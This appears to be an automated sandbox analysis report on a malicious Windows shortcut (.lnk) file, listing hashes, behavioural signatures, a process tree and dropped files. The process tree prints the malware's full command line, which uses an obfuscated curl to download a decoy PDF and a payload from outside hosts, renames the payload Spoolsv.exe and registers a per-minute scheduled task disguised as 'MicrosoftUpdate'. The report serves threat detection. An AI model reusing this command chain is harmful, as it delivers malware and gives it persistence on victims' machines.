Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    06-10-2024 01:14

General

  • Target

    6d6dc50e8e73053763f9b85b7c1f1b532ec3023b5b89b3546f0330b4956e75a9.lnk

  • Size

    4KB

  • MD5

    fd49a7937e010acb2c6ed20c22f493f2

  • SHA1

    27f61fdf3989a8f3b67307af8bf669577edbe694

  • SHA256

    6d6dc50e8e73053763f9b85b7c1f1b532ec3023b5b89b3546f0330b4956e75a9

  • SHA512

    65555d2e09defbdc83859416ded4405bc5643e52568013715850b4ad6f0b36cc6cf9eb345d5fccf33e55bb9e37323040c68e3e405225b4a9f3ca05b894a38e47

  • SSDEEP

    96:8EaV7c3Ox9H19sx9WAxaGvwALoj3uSY+JO:8EaV7cerXsrjj4A43hv

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Service Discovery 1 TTPs 1 IoCs

    Adversaries may try to gather information about registered local system services.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\6d6dc50e8e73053763f9b85b7c1f1b532ec3023b5b89b3546f0330b4956e75a9.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3308
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" ; cmd /c cls & c^url --output C:\ProgramData\Robot_Radiation_Project1.pdf --ssl-no-revoke --url https://huanetdw.c-cdn77.com/grquwy287gdejh39/cfswr523 -s & start C:\ProgramData\Robot_Radiation_Project1.pdf & c^url --output C:\ProgramData\Robot_Radiation_Project.pdf --ssl-no-revoke --url https://huanetdw.c-cdn77.com/grquwy287gdejh39/cfswr523 -s & c^url --output C:\ProgramData\Microsoft\DeviceSync\job --ssl-no-revoke --url https://dugayqwh.c-cdn77.com/fsuwrui8uuoiduefh76435bkow9djl2ryriet/ueworoejvdvhruthqq3 -s & move C:\ProgramData\Robot_Radiation_Project.pdf . & del *.pdf.lnk & cd C:\ProgramData\Microsoft\DeviceSync & rename job Spoolsv.exe & SCHTASKS /CREATE /SC minute /TN MicrosoftUpdate /TR "C:\ProgramData\Microsoft\DeviceSync\Spoolsv" /F "
      2⤵
      • Checks computer location settings
      • System Service Discovery
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2516
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& Import-Module 'C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\..\Pester.psm1'; & { Invoke-Pester -EnableExit ; cmd /c cls}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3820
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lbcxzcxb\lbcxzcxb.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4296
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES92F9.tmp" "c:\Users\Admin\AppData\Local\Temp\lbcxzcxb\CSCB4A443A99AD3456ABBB548925D5F41.TMP"
            5⤵
              PID:4904
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c cls
            4⤵
              PID:1236
          • C:\Windows\system32\curl.exe
            curl --output C:\ProgramData\Robot_Radiation_Project1.pdf --ssl-no-revoke --url https://huanetdw.c-cdn77.com/grquwy287gdejh39/cfswr523 -s
            3⤵
              PID:2036
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\ProgramData\Robot_Radiation_Project1.pdf"
              3⤵
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Modifies Internet Explorer settings
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:5024
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:736
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C90F4E394A00F5B187A926C8BB4D3210 --mojo-platform-channel-handle=1724 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1040
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=984304CF8634C7C77175F937305681E6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=984304CF8634C7C77175F937305681E6 --renderer-client-id=2 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job /prefetch:1
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1632
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=23A0F73B1F56ABC3890798D4C7B02A8E --mojo-platform-channel-handle=2264 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1776
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=792079C741E2A75DD4DE9765246032F6 --mojo-platform-channel-handle=1904 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4004
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B0E903BDEBFC991980858D1F1B8391B0 --mojo-platform-channel-handle=1896 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4336
            • C:\Windows\system32\curl.exe
              curl --output C:\ProgramData\Robot_Radiation_Project.pdf --ssl-no-revoke --url https://huanetdw.c-cdn77.com/grquwy287gdejh39/cfswr523 -s
              3⤵
                PID:3804
              • C:\Windows\system32\curl.exe
                curl --output C:\ProgramData\Microsoft\DeviceSync\job --ssl-no-revoke --url https://dugayqwh.c-cdn77.com/fsuwrui8uuoiduefh76435bkow9djl2ryriet/ueworoejvdvhruthqq3 -s
                3⤵
                  PID:4244
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /CREATE /SC minute /TN MicrosoftUpdate /TR "C:\ProgramData\Microsoft\DeviceSync\Spoolsv" /F
                  3⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:232
            • C:\Windows\System32\CompPkgSrv.exe
              C:\Windows\System32\CompPkgSrv.exe -Embedding
              1⤵
                PID:2008

Network

MITRE ATT&CK Enterprise v15

Downloads

              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                Filesize

                64KB

                MD5

                f9868437938781e903576b483d0aeebb

                SHA1

                5cafbb4e5396660be36ce9c8cf0562de14ff3bb3

                SHA256

                a11d79ec2da382c655bc49e8f795fa0eb8ae71086b8e465ad7a9a53658846906

                SHA512

                8fc296dc6ddee51f13783ebc85557fa2bda36fa7c4ca984b69f6b66bb982aed0823ac7cbcc6651947170932ce81eb64a448cc651329506cf243808e957db8e59

              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                Filesize

                36KB

                MD5

                b30d3becc8731792523d599d949e63f5

                SHA1

                19350257e42d7aee17fb3bf139a9d3adb330fad4

                SHA256

                b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

                SHA512

                523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                Filesize

                56KB

                MD5

                752a1f26b18748311b691c7d8fc20633

                SHA1

                c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                SHA256

                111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                SHA512

                a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

              • C:\Users\Admin\AppData\Local\Temp\RES92F9.tmp

                Filesize

                1KB

                MD5

                c0696c54ffdd2eba80e86f94af95ef97

                SHA1

                cbfe9ac562cdfaf4a83ca6c28c6e328349dee6cd

                SHA256

                f56f5c46b15f8f5f07389c684ba54bb6a55160841a5af87e745f005dc75054c2

                SHA512

                69157aaad044632592d8c6a1428f0c31fd3d08a57b706981e45cf32dc2720cb6f1043212a5093048b68401a002157baac8ef2bde05b1181275f90a80b0976e2b

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b5ppsqz1.5jy.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\lbcxzcxb\lbcxzcxb.dll

                Filesize

                3KB

                MD5

                35cf326b8b6dbdbe8636f66844101707

                SHA1

                8ebc1f01fdb0331ca960d4334bd3974cb20e8914

                SHA256

                769c3546284a2876151a2ae7fd842e9f313f4c59e6a5dc9d8fffab632e043cd8

                SHA512

                2461ea5959e13e43c833d3e6bbf62b12fc2e6da87667681f9f1acae6472ff5714f8f821743872002a2699e9433efc8333928026e6dc2aff01701ddbd8f4330d9

              • \??\c:\Users\Admin\AppData\Local\Temp\lbcxzcxb\CSCB4A443A99AD3456ABBB548925D5F41.TMP

                Filesize

                652B

                MD5

                508dfd99f618c51127f4a81107de0d4c

                SHA1

                8220c572a520406119d217a57a562aed31d5a5a0

                SHA256

                480bfd9f2d687dd9d55a434c1674fb5c7cb2a5ba50147e1d7647be851f864298

                SHA512

                aceb0a670554b7d0d97b0e03f19bf463ac799eaae67025269eee19908f10931c046a58a26e1cec4913772537ec60df0386c8b617d0d2924294a3671e8c4c29e7

              • \??\c:\Users\Admin\AppData\Local\Temp\lbcxzcxb\lbcxzcxb.0.cs

                Filesize

                907B

                MD5

                d98b32865e5bd9376502ce614141b7fa

                SHA1

                673d622933fbdb9aaafaf847c3cb8f1ce4b18cbc

                SHA256

                6d21e15bcaebe4b6461790fbe39381ef6dc736eec19a66e80ee15caf4680fe00

                SHA512

                28f4ec12ba6b47af36e288a81de46ce017144416626c50c4266207f92ac5d4b532691e1ee5a3cf54abc0c567e5cd60fb3d3180e8829cdbfab98013d45377ddb0

              • \??\c:\Users\Admin\AppData\Local\Temp\lbcxzcxb\lbcxzcxb.cmdline

                Filesize

                369B

                MD5

                8ab74c6dc55fd4e779803b67f01b7f17

                SHA1

                5170645abb21d9fb51a80dd4e5563e22ca7349ac

                SHA256

                27a855cf2d6582e16086f063964ff1cda3cd0213ecc60c0416c31d5455f7993a

                SHA512

                3fbe9e4763c04d2e60b445cb088900fd530c3390b5350b40b67a63fbd9342dc307efcf127546c62923587970679ce475efd74d2a936e1ae114b739e6bf8ce403

              • memory/3820-0-0x00007FFED4123000-0x00007FFED4125000-memory.dmp

                Filesize

                8KB

              • memory/3820-13-0x0000022B3B700000-0x0000022B3B72A000-memory.dmp

                Filesize

                168KB

              • memory/3820-27-0x0000022B3B4A0000-0x0000022B3B4A8000-memory.dmp

                Filesize

                32KB

              • memory/3820-14-0x0000022B3B700000-0x0000022B3B724000-memory.dmp

                Filesize

                144KB

              • memory/3820-29-0x00007FFED4120000-0x00007FFED4BE1000-memory.dmp

                Filesize

                10.8MB

              • memory/3820-32-0x00007FFED4120000-0x00007FFED4BE1000-memory.dmp

                Filesize

                10.8MB

              • memory/3820-12-0x00007FFED4120000-0x00007FFED4BE1000-memory.dmp

                Filesize

                10.8MB

              • memory/3820-11-0x00007FFED4120000-0x00007FFED4BE1000-memory.dmp

                Filesize

                10.8MB

              • memory/3820-1-0x0000022B226D0000-0x0000022B226F2000-memory.dmp

                Filesize

                136KB